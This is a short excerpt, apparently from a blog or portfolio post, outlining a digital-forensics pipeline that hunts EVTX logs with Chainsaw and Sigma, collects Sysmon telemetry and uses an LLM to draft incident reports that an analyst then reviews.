LLM

Automation shouldn’t replace judgment; it should buy you time to use it. Problem DFIR analysts burn hours turning raw detections into readable narratives. EVTX hunts surface signals, but write-ups lag behind, delaying remediation and weakening portfolio proof. We need a repeatable way to go from logs → findings → human-ready report without sacrificing accuracy or analyst judgment. Approach Small pipeline: Chainsaw (Sigma EVTX hunting) → SwiftOnSecurity Sysmon config (clean telemetry) → PowerShell simulator (lab noise) → Python LLM summarizer (structured narrative + IOC table). Human stays in the loop for validation and context, not rote drafting. ...